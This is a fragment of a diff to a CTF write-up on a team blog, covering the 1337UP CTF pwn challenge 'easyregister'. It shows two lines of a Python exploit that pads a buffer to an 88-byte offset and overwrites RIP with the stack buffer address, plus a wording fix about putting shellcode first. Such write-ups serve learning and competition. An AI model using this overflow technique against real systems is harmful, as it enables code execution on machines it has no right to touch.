blog-tamilctf/blog-tamilctf.github.io/_posts/2022-03-13-1337UPCTF-pwn-easyregister.md

 payload += b'A'*(88 - len(payload)) # junk
 payload += p64(stack_buffer) # buffer base address
 ```
-- let's put our shellcode at first and fill some junk until RIP
+- Let's put our shellcode at the beginning and fill some junk until RIP

 *Note: Offset to RIP is **88***